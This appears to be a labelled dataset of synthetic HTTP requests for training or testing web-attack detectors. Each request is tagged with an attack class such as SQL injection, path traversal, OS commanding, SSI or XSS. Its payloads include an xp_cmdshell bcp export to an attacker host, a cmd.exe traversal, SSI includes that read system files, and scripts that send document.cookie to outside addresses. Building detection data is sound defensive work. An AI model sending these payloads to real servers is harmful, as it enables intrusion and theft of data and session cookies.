Transfer-Encoding: pbew
Upgrade: 6xY99/6.6, Cho/2.5, Ahw1G/3.8, teq/5.9
X-Serial-Number: 34835621306
----: --------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 39898
Start - Id: 42327
class: SqlInjection
GET /Gnnifhla/hhK/rfmnithtee/rdEbJVA6_/aelr/rRpXI99scriptrN_@services7Q/ihy2nYGKh6H/sW/oa3hfaqseee/thoveo/kpmet/lElhothiXmom1e.css?arofcgoNtao=++oZ%5Dcpslboot.inisfrfnMn6m%2F+&tdghcaiqttea=2244&fEFDPircp=2660976&hrxa7stueo=yio%3F+at%27i%5Db%3CS+94et&oEeV=t8%3DaL+&htitl=e&csa4eed=bA2B&ou8cgmsatcngom=stiktsts&sauehzdoniu0ape=oItRoh1hfc2o&nosaeypqig=3rUrMoEseeO6F&aRDTH7jK=%3B+select+++*++from+++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3DvhNalee1%3Bpwd%3Dab%3BNetwork%3DDBMSSOCN%3BAddress%3D35.88.38.149%2C42592%3B%27%2C%27select+++*+++from+++++ssoteadosr%27+%29&hgBwsRPdCH=wBY&9QnodeHbAwkq=ecm6933PF&ou=trtone8edr20wlnl&EeSrn=36 HTTP/1.1
Host: www.tghkattuph.it:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.0
Accept-Language: *
Cache-Control: min-fresh=59084
Client-ip: 64.206.153.107
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="397"
Date: Fri, 07 May 04 23:13:20 UTC
ETag: "_at_8Q7MdmKLmwJJCd"
Expect: 100-continue
From: vtsibh@nsti.biz
If-Modified-Since: Sat, 19 Dec 09 02:46:38 CET
If-Unmodified-Since: Mon, 12 Jul 04 23:51:17 CET
If-Match: "uEU.h86h8s.eDS7QGk1B"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: uoEnqe 1brd=avihTo
Range: -416,3-,-523324
Referer: /kitd/jet0uh/ntbteat/Heakf/rersnn.cfm
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: xSGJb@fIV http://www.i0Tei.biz
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 3.7 85.43.220.45:4691, 7.2 www.z4nr.jpeg, 9.0 183.175.36.77
Transfer-Encoding: deflate
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42327
Start - Id: 36143
class: PathTransversal
GET /gReAivHoao96teE/DpJfdY5MynuWJ/qL4XI7kG/xmHjg_5XFSTc5._/aQzJ7y-xs_N/lpezaEsaoaAoa/dOhEtdCKGDfivnzL_.sh?uTVcFn=votp&gt2=nnnu%3A%29r2xTfInmv&e9fysrPer=+eieseesreplaceeaxunion%3BDt%279%24&nrattnoiwnp=%3C%3AiIerliprocessing-instructionwcsock_streami%3B&oreatt2nexs=ag6j6tsOrrthrhpf&Ecytrt=2amHu1nhldhsete&GooKIl=3&rcn=..........................WINNTsystem.ini&aatr5tree3etn=anffDec%40yH5&Cyt=7451&vinisth=c5enalinsnd9mp&la887gysyazE=rbreN&ns5oeerd3Bo=%3Ae HTTP/1.1
Host: 42.231.38.220
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: attlo-eehI;q=0.4, hkemji-snooteay;q=0.7
Cache-Control: max-stale
Client-ip: 25.79.74.161
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="1"
Date: Sun, 21 Jun 09 15:09:44 CET
ETag: "1Th7ACFJdKWcpA5LuNZ"
Expect: 100-continue
From: aitunw@tegatgpn.uk
If-Modified-Since: Tue, 02 Oct 07 07:12:32 GMT
If-Unmodified-Since: Tue, 02 Dec 08 04:05:18 CET
If-Match: *
If-None-Match: *
If-Range: "H8gfUtigzcQqr2VI"
Max-Forwards: 8431
MIME-Version: 1.7
Pragma: tmetu=Etciw
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest qop=hiiaf
Range: -52194,2-,7-21979
Referer: http://www.awbi.com/ed0ohhge/yu8th/ewes/0rrc.mp3
TE: chunked;q=0.0,chunked
Trailer: Connection
User-Agent: Eau43eBa
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: HTTP/0.5 20.157.238.132:065, 0.3 www.roes.tiff
Transfer-Encoding: identity
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36143
Start - Id: 48740
class: XPathInjection
GET /stESn.js?@jMstyles-qoB=Trxaeh%27+or+%28i+++++%3C++++count%28dhacm%2Fchild%3A%3Atext%28%29%29++and+++j++%3C+count%28yhlqO%2Fchild%3A%3Acomment%28%29%29+++and++k++++%3C++++count%28fEf%2Fchild%3A%3A*%29++++%29++++or+++++%27daieaQpw%27+%3D+%27+++mh0lie%27+++or&qlibLwopDXp-=etGF-CESryk HTTP/1.1
Host: www.iu3yNaz.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eef1b-6Lixf;q=0.1, l9otw-eiee;q=0.6, eabnca-sD
Cache-Control: max-age=1276
Client-ip: 7.35.45.248
Cookie: ni4s=582157;tehT6eHmcanaMo=6\;rcgekDMmK2-0=tho> ;d0owe=44322;pnash3gc=powewseGh1iltesrpn;dqztLmhtjirhc=nidg8 eaee4tomo
Cookie2: $Version="20"
Date: Thu, 08 Jun 06 23:20:23 GMT
ETag: W/"hMfoJBBtoLbN@LCj"
Expect: fonrex
From: lYglyt2@7smfrhi.org
If-Modified-Since: Wed, 24 Nov 04 11:13:40 GMT
If-Unmodified-Since: Wed, 14 Nov 07 17:19:03 CET
If-Match: "1zZX0xDp1q4wcjjdo"
If-None-Match: *
If-Range: Wed, 03 Mar 10 21:40:47 UTC
Max-Forwards: 5816
MIME-Version: 9.4
Pragma: orR='tItvsia9'
Proxy-Authorization: Basic MXRmVGVkYTplaGVzdHpoaA==
Authorization: ipell hd9inJu4=onthee52
Range: 328-,-79624
Referer: /httr/mn4suno.bin
TE: deflate,gzip;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/0.9 (compatible; iuodntodi; Unix; goIs; 3E3a; eStvEet)
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: ekt/4.2 76.250.150.25, 6.2 227.235.252.211, celnf/2.0 163.145.61.193:410
Transfer-Encoding: gzip
Upgrade: ls4i/9.1, snhjn/6.4, en4a/1.2, dbennt/8.6
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48740
Start - Id: 36555
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 46.149.113.108:35
Connection: close
Accept: video/*
Accept-Charset: iso-2022-kr;q=0.9, windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: eildl-ct9mues, v7h4w-oie;q=0.2
Cache-Control: max-stale=681
Client-ip: 131.100.188.215
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="25"
Date: Sat, 11 Apr 09 16:48:54 GMT
ETag: "._sHr99T4AKY.QbUteoU"
Expect: ft7A=n8gttEd;crsu
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Sat, 26 Apr 08 23:56:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 5.7
Pragma: Q='faaoepns'
Proxy-Authorization: Digest nc=Ad95328B
Authorization: NTLM cmlvb2Fvb2luaGRzaGp0czdvd2xvYWhrNDR0Z2VhbGEwYXppdGk0Ym5kc2tB
Range: -7292
Referer: /rlriira/blmt.cfm
TE: deflate,gzip
Trailer: If-Match
User-Agent: fmfyhtc (etPT0xjh; mf_jdW_a)
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 547x5195
Via: 8.6 83.226.211.193, HTTP/4.5 253.69.13.41
Transfer-Encoding: identity
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36555
Start - Id: 38998
class: LdapInjection
GET /aOb-2edJA/eiwqhkI./y_uAPlr/vXNH/wk/rfN38948Qn3IYn4f--i/mtluwCldosse/4oqE3rfuitn9nto4ny63/e806dAk52T@t3H2.gif?lmtDncha=tK3M&chc8ai8kSarErh3=eeu96&0ecrg9jr=hhttpsN&AsrxM28bhm2erpg=edemJte3ee63rnr&npnh=852076&ua=g43sanm1j&ldLil-=ptmpforme2&TzQCjsl=0adtposhr3a&qKA.qEf=gkeivnyceIe&uIqretnoi0=CtnnreadwinntZ0fhtaccesrdwinnte%7E&yrjsR6a61=54&9huevsEi=y&3opoenW=%2Bskpositionaaxlit%5CEbg+&ortt2=anbhat3eTnuHha&3XuWjYz=tE9%29%28%26%28objectClass%3D+++er*%29 HTTP/1.0
Host: www.uywn7ihyr.be:80
Connection: keep-alive
Accept: text/plain;q=0.5, application/rtf
Accept-Charset: iso-8859-8, x-mac-ce;q=0.6, windows-874;q=0.9, x-mac-roman;q=0.0
Accept-Encoding: deflate
Accept-Language: q-hnOgeia;q=0.8, t4nhyyi-p;q=0.3
Client-ip: 176.94.177.249
Date: Tue, 27 Sep 05 12:00:30 GMT
If-None-Match: "yHuSC4Cczqfn-HRdTiH"
Proxy-Authorization: Digest username="gsmPaTgi"
Referer: http://www.jtjti.be/oOrgcuen/ttHv/esrtd.gif
User-Agent: tH6H9v http://www.A2sip2.org
Via: 4.9 www.r8lrjc.gif, HTTP/5.4 206.159.138.65:16098

null

End - Id: 38998
Start - Id: 39506
class: SSI
GET /iEhxctc/cherhMs5bERhnt3iRvl/wbl8ags/-LCzLZf/ts2z8F/p6f54hn_ekxGL/pdORoYNlw0eY/tnslia/iG6BFGJ9KNYcOP/rr4d8e7jE/tBtLn3UvRRaF.html?evneahtdotnnyti=kndre1e1tp69scriptmeinclude+ind6&ktQfgk=uvbscript%3BEezaccepterh%40%2B&nij8tuinoo=tXh7kP&7a=dUkninec&iwdiiactae=423&10nn=dt8&hdw=%40lxmlL2nE%7E&enaaGpE5tBt2Ntd=nrXxfY4.lYg&amOtnmK=eAtnibb&lleufo1iRGyzu=22669&denunI=rcsaayte&inputmDDv.ttFb=aeA HTTP/1.0
Host: www.eituohcone.st:361
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.0, windows-1251;q=0.3, cp-950;q=0.0, cp-932
Accept-Encoding: 
Accept-Language: r8it6ui-hrditr, tt-tenP;q=0.6, w-TOh1nh, ay-u;q=0.0, Orya-eeahugUy;q=0.8
Cache-Control: only-if-cached
Client-ip: 192.19.49.212
Cookie: plsuiii8uemwmb=teaaov;3T2sge=re amhier;9e10eownph8rr=46987803
Date: Fri, 18 May 07 02:24:44 CET
ETag: W/"IgSfk8HKym@WoHL"
Expect: 100-continue
If-Unmodified-Since: Sat, 12 Jul 08 18:57:23 CET
If-Match: "oShvP0_S2w2ien2AL"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.3
Pragma: aqrt=ao3L
Authorization: Basic dEM2bTJvQTo2ZXNl
Referer: http://Le4ls9ss.cz/cdi4/ojutanHz/o5lGh/beaoo.cgi
User-Agent: <!--     #include  virtual="/var/log/httpd/access.log"     -->
UA-CPU: MIPS
UA-Color: color16
UA-Pixels: 8306x0856
Via: 2.8 57.44.93.6
Transfer-Encoding: identity
Upgrade: dDl/9.5, nlx/4.9, ahhDz/9.1
Warning: 628 148.151.2.105 "y0cm" 
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39506
Start - Id: 38483
class: LdapInjection
GET /dSpCxJj9mf/FQposition/tztab5im/sW6N/alkowtor/wXxrg6_RWA6n7NTSSG7/r_qpd85D@i/6ritFt3wrhsii/dJ7jFyx.2JadisKoC/eJSkiNaZa/enElmkuldcsusebzs.gif?toemEceaipor=%29++++%28++++%7C+++%28jlege%3DTbs*%29&se3=ebIIE HTTP/1.0
Host: www.2yim0corh1.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.1, deflate, compress;q=0.1, identity
Accept-Language: *;q=0.0
Cache-Control: min-fresh=597
Client-ip: 50.101.101.125
Cookie: edmismI=jeledtimASnjti8m;6Scp5ahtmeenb=tnAratrti|f4ozdelete;hdmsomrbrbtiee=shiyiM=select(Coo-t=46a;eseLr9toteuado=42128326
Cookie2: $Version="51"
Date: Thu, 02 Aug 07 13:06:11 GMT
ETag: W/"HdLDJ1hGjmZABeS"
Expect: iqiew4i
From: b8antatt@o1neid.cz
If-Modified-Since: Fri, 06 Feb 04 03:52:24 CET
If-Unmodified-Since: Sun, 01 Aug 04 16:57:57 CET
If-Match: *
If-None-Match: *
If-Range: "gHtCQ_GNSjsam_ynpF"
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: NTLM NHJtbktVblI4QXJ3Mm1ubGdzaXI5aW9kZmVPd2JwbGdmZWR0czc=
Range: 58935-,-048057,4298-
Referer: /9rinOssd.cgi
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: Mozilla/0.8 (X11; U; Linux i586 8.3; se-om; rv:4.2.7) Gecko/87955001
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: 4.6 www.ha09siwo.shtml:8588
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38483
Start - Id: 48175
class: XSS
PUT /rp.aspx? HTTP/1.1
Content-Length: 221
Content-Language: cxae25,ocxonroe,tUai
Content-Encoding: compress
Content-Location: http://www.rbai.fr/Ytydo/eg9erdte.swf
Content-MD5: ZnpmYWh0Tll1WWFlZmhuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Nov 07 03:28:57 UTC
Last-Modified: Sun, 03 Aug 08 23:16:55 UTC
Host: 216.182.94.40
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.3, text/plain
Accept-Charset: iso-8859-8-i, windows-1258, x-mac-korean;q=0.2, iso-10646-ucs-2, isiri-3342;q=0.7
Accept-Encoding: gzip;q=0.8, gzip;q=0.7, deflate;q=0.7
Accept-Language: *
Cache-Control: qtlu8=3
Client-ip: 180.49.97.230
Cookie: group byLwinntvarLAstdinMnph-u=nweoyeoaj 4l;Tasae7byudhnae=25908;Uoui=0745845;pR3U_q@3Z=) ee9>UielInodeEutmp
Cookie2: $Version="8"
Date: Mon, 14 May 07 23:07:06 CET
ETag: W/"fWjHf.8xJdj4mZc-UDXZ"
Expect: 100-continue
If-Modified-Since: Mon, 25 Sep 06 17:33:40 CET
If-Unmodified-Since: Sat, 09 Jul 05 22:46:41 UTC
If-Match: "aw2lIMZhbKvM4TpuIS6"
If-None-Match: *
If-Range: Thu, 04 Oct 07 01:12:33 GMT
Max-Forwards: 559
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="Nbcsty"
Range: 252-,4-47,9983-
Referer: /yahe/rpAt/jWag/o0tehv.js
TE: deflate,trailers,chunked;q=0.6
Trailer: If-None-Match
User-Agent: <![CDATA[<!--]]  ><script   >[document.location.replace   ('http://www.toveting.com/cgi-bin/resi.cgi'+document.cookie);]//--></script   >
UA-Disp: 7787,6372,16
UA-Color: color8
Via: 4.0 141.174.122.210, 8.2 217.29.45.244
Transfer-Encoding: compress
Upgrade: eMe/4.0, mna/3.4
X-Forwarded-For: 203.248.86.3
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HshLnRoeo=79557&lsF=7529&TCiyeeepeL=1naaeudlotcnto&loguc50Ts6otd=554611&AlcolpitwR=h&Nuaccess_log_V=n&tnesrbt=3446369&Reoeikes=6gCL0OX3-&dfbmochahWqUVkP.=c2H_&nAecdloonne9st=nninetcattsnn$'|]https&fhghSnoiTxih=bs4

End - Id: 48175
Start - Id: 38062
class: LdapInjection
GET /OuZ7my/a9q-4Ztoad2iet1varjx.tiff?p_jI=151685&ufntte=41326780&drctn7Iio=%29%28++++%7C++++%28cn%3D*o++++%27brien*++%29%28mail++++%3D*o+++%27brien*+%29++++&eeimf=9xksksl HTTP/1.0
Host: www.tfxe.net
Connection: keep-alive
Accept: text/*, video/*;q=0.2
Accept-Charset: x-mac-arabic;q=0.2, utf-8, x-mac-ce
Accept-Encoding: *
Accept-Language: ioo-wcihR2b
Cache-Control: only-if-cached
Client-ip: 193.128.109.55
Cookie: eDaob1sllzscnn=6118333292;iekcew=aCyYJEBq@utV
Cookie2: $Version="947"
Date: Mon, 08 Sep 08 08:32:27 CET
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Fri, 15 Oct 04 05:28:21 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: *
If-None-Match: "dRhld4vrKTdcaG5u90O"
If-Range: Tue, 13 Sep 05 12:59:27 UTC
Max-Forwards: 912
MIME-Version: 7.3
Pragma: robMf='esns'
Proxy-Authorization: Digest cnonce="iHtefan"
Authorization: Digest uri=/qnnaucth/btds.tiff
Range: 77-,76-
Referer: /tnpse.gif
TE: gzip;q=0.2
Trailer: Accept
User-Agent: hrEaiF (fkNxQBX)
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: 8.2 32.42.123.12:6031, FTP/6.7 116.101.17.26:63, 2ha/1.9 www.ist6enno.png
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38062
Start - Id: 40973
class: SqlInjection
GET /eaeoti/esofhTu5eyutg/iWQ/ohpacoytjL/sos7refurod/t-/pJUbcIbqTXxq/eee/oE6PTfmbphNJBva.3J.U.aspx?p3Hccral=wpcrn&QZ8PK.acceptu8r=18&sqge72=87662&bhll16eia6eh=3423237&sbE=d&eemof=seoto&siiseda=deepnnsi&RoptFidYdocumentncFmNNB=rG%40eCun&oZg8L_Tb=ees+wmet HTTP/1.0
Host: 208.216.11.221
Connection: xcdset
Accept: application/x-tar;q=0.4, text/plain, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: exec     xp_cmdshell    'bcp "select     *   from    strccjc5t"     queryout  pwdump.exe   -c    -Craw     -Shackersip     -Usa   -Ph8ck3r'
Cache-Control: only-if-cached
Client-ip: 182.125.177.3
Cookie: U5MQdpVV@Q=isqvnei;finO2t3xi=rpujnetcat
Cookie2: $Version="8"
Date: Mon, 16 Jan 06 04:50:25 GMT
ETag: "Kf@7..91LZ5JErV-"
Expect: 100-continue
From: mlogea3@sheg.uk
If-Modified-Since: Tue, 09 Feb 10 04:56:40 CET
If-Unmodified-Since: Sun, 15 May 05 02:38:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 220
MIME-Version: 3.8
Pragma: ekno='o'
Proxy-Authorization: NTLM eWJyc2hxaUFtbGZzc3IxYXVzdGFyNXMwNnQzemVnd2tpZU1MaHJwbW1sQXhzbA==
Authorization: Digest qop=auth-int
Range: 89338-,-569,5389-6783
Referer: /42rrte/esrhpie2.pdf
TE: trailers,trailers
User-Agent: eonrsntiMedmcRicbra
UA-OS: FreeBSD
UA-Color: color32
Via: 0.3 www.atafn0r.jpg
Transfer-Encoding: identity
Warning: 891 www.Dgnneo.png "tgConortovhrr" 
X-Forwarded-For: 175.150.199.175
----: --------------

null

End - Id: 40973
Start - Id: 46984
class: XSS
GET /gihk-6Kc1F1/eizietem/3NfforrsoFeirsEgnaet/a8.css?allCKKsDdO1q=%3Cimg%2Bsrc%3Djavascript%3A++++alert%28%27d4eae.Eetwyu%27%29+++%3E&accept5eOtN=29709&te6tdth=3 HTTP/1.1
Host: www.cte4soety.net
Connection: keep-alive
Accept: audio/*;q=0.8, application/*;q=0.0
Accept-Charset: x-mac-roman, x-mac-arabic, x-mac-ce
Accept-Encoding: *;q=0.9
Accept-Language: Granm-oTh6t;q=0.9, acE-ase1trl
Cache-Control: max-age=7803
Client-ip: 142.43.118.142
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Sun, 30 Oct 05 23:37:02 GMT
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: 100-continue
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 25 Sep 06 19:21:45 CET
If-Unmodified-Since: Sat, 20 Mar 10 06:00:37 CET
If-Match: *
If-None-Match: *
If-Range: "w6J_AGL-poMHck9z3z"
Max-Forwards: 451
MIME-Version: 8.6
Pragma: 0ha=1m
Proxy-Authorization: Digest realm
Authorization: Basic U2VsdGw6aWxlcmVZ
Range: 5-22964
Referer: /aLuuts/ninnd8/dfiec5/tieeien/esth.rar
TE: trailers,gzip,gzip;q=0.5
Trailer: Range
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 3.6; No-de; rv:8.7.4) Gecko/05152375
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 199x2885
Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 153.150.34.190
X-Serial-Number: 09560109
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46984
Start - Id: 46739
class: XSS
GET /anjessdelieogk/w6N/Iaccess_logyfn/a2OqKhw9pu67F9u2/zGoNNr/eTXTGCg2ZGJ7jZPjzQ/eIIPwCi/sQIHBuEjF9rV4z78pi2z/9Hg8cElY.yI/tJa3hsraazrbmea4l.shtml? HTTP/1.1
Host: 63.134.131.24
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, compress
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 187.192.160.132
Cookie: nqqznj_YGQ=<input type=    "  image"   dynsrc    ="    javascript:  [window.open('http://3.237.108.228/llonin.cgi'+document.cookie);]  "    >
Cookie2: $Version="780"
Date: Fri, 25 May 07 10:59:09 CET
ETag: W/"TW83Vyq71WoHPX8cEG3S"
Expect: aatanne=bnToRas
From: vpiisea@ttsPnero.gov
If-Modified-Since: Mon, 26 May 08 04:58:59 UTC
If-Unmodified-Since: Thu, 08 Feb 07 18:13:37 GMT
If-Match: *
If-None-Match: "OVN@844YnlNN7OM-qjiP"
If-Range: Wed, 28 Apr 04 19:09:37 GMT
Max-Forwards: 5497
Pragma: no-cache
Range: 442056-228255
Referer: /hh6w.rar
TE: trailers,chunked;q=0.8
Trailer: From
User-Agent: Rwwofle/4.1.4.3.1
Via: HTTP/2.3 230.233.223.74, HTTP/4.4 www.da0t8ii4.gif, 0.2 www.osodl.jpg
Transfer-Encoding: rxszi0; hghiusik=carma
Upgrade: acef/9.1
Warning: 811 www.etimuquh.jpg "yaitsotn" "Wed, 27 Jun 07 01:22:44 GMT"
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46739
Start - Id: 40408
class: SSI
PUT /tfgsrfoanrmtod/X@XhtaccesPYKcE9y/aNt/RPexecbHperlcausr9/cJRcJ.Vmail_zi/eiEnlde/sI0d2VQGVZqa2/US2OXCZJUlNT.aspx? HTTP/1.0
Content-Length: 211
Content-Language: ttbgh7a,duhtwaw,tReeop
Content-Encoding: gzip
Content-Location: http://www.aTanaadh.fr/tttzj.nsf
Content-MD5: cmFuZWtOb2U2bXNpbHRvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Apr 04 02:42:48 UTC
Last-Modified: Fri, 17 Jul 09 08:38:17 GMT
Host: 133.144.145.229
Connection: chjsne3
Accept: image/png;q=0.7, audio/basic, audio/basic;q=0.9
Accept-Charset: euc-kr;q=0.5, shift_jis;q=0.6, iso-8859-9;q=0.3, euc-tw;q=0.6
Accept-Encoding: gzip;q=0.3, identity;q=0.9, deflate, identity, deflate
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 92.107.40.54
Cookie: ertEauci=0aLrribostwinntd6;ncca=38;otfaAoniyhypjt=31
Cookie2: $Version="3"
Date: Thu, 07 Sep 06 17:00:03 UTC
ETag: W/"5EI0NvigZQ0wYh_Mhu1T"
Expect: tnFAu=roDct
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 19 Aug 04 13:25:39 UTC
If-Unmodified-Since: Mon, 19 Sep 05 06:41:24 UTC
If-Match: *
If-None-Match: "PhNL94ZtW7Zsy-l"
If-Range: Fri, 18 Jul 08 17:28:05 CET
Max-Forwards: 0444
MIME-Version: 9.4
Pragma: nt1eh9hs=e
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: yrMme ovYOa5ur=Arrt
Range: -0
Referer: /2rinrjh9.tiff
TE: trailers,gzip;q=0.6,trailers
Trailer: If-Unmodified-Since
User-Agent: s3vZO_hY. http://www.eeTF.com
UA-CPU: Sparc
UA-OS: WinNT
UA-Pixels: 5480x145
Via: 1.2 www.nuewietl.jpg, HTTP/7.1 199.89.154.197, 1.5 www.slhn7.png
Transfer-Encoding: deflate
Upgrade: ereyo/1.5
Warning: 324 55.206.31.28:42227 "mlq6npnaa" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rlneiwhs=6JxNrY@VD&htaccesdIX5O=$a rjvmideaa[2neeRsl&lyi=si&he1eau=079613733&odbon8ki=ttntr&Saidctbgno=utg5dED&D33w=<!--#include    virtual="d:\windows\autoexec.bat"     -->&idejzon=D5e

End - Id: 40408
Start - Id: 40736
class: SSI
GET /dlsjjbnzo9e2obutaeo/fimenuotn/YntmeladDioS2s/6tidritparwukIwi5ra/muCtSc1/c-ZGlBHjJaPF/npXBjsCBO-ErV147y5sK/rg6nj/DY0CwP.Xea0p8/oDG/aHl79w_g8M/mlmkfetqr.mdb?Sdhogu1WXq=itrm&y6dDVEkE.=nsr&geino3f=oea7g&doinkihplfn4nio=x HTTP/1.0
Host: www.nltieefa.uk
Connection: oEmr
Accept: */*
Accept-Charset: utf-8;q=0.0, x-mac-japanese;q=0.4, big5;q=0.3
Accept-Encoding: compress;q=0.1, deflate, compress;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 16.178.105.52
Cookie: r2mUqtfz=429523087;tgtnskenf=6V-DhGbOVJa;z9teee=phy;5bt=;xb~gt p& h edf;rldc8lhle2tRdn=82416;n1oom7rehbedls=<!--    #odbc   statement  ="select    sweryzy,     rs,   nxyd    from     RcAispai  order     by     4,  50,     1"    -->
Cookie2: $Version="1"
Date: Sun, 03 Jan 10 16:28:18 GMT
Expect: 100-continue
If-Unmodified-Since: Thu, 28 Jul 05 03:42:24 GMT
If-Match: "5cu5INwhqbYQcVo"
If-None-Match: *
If-Range: Tue, 03 Apr 07 23:48:25 UTC
Max-Forwards: 174
MIME-Version: 5.3
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="8mnsEs"
Referer: http://eyohsbih.be/5bTeRlUn/rSnllaal/xadesw/gbjnpl/stdp.asmx
TE: deflate,gzip;q=0.0
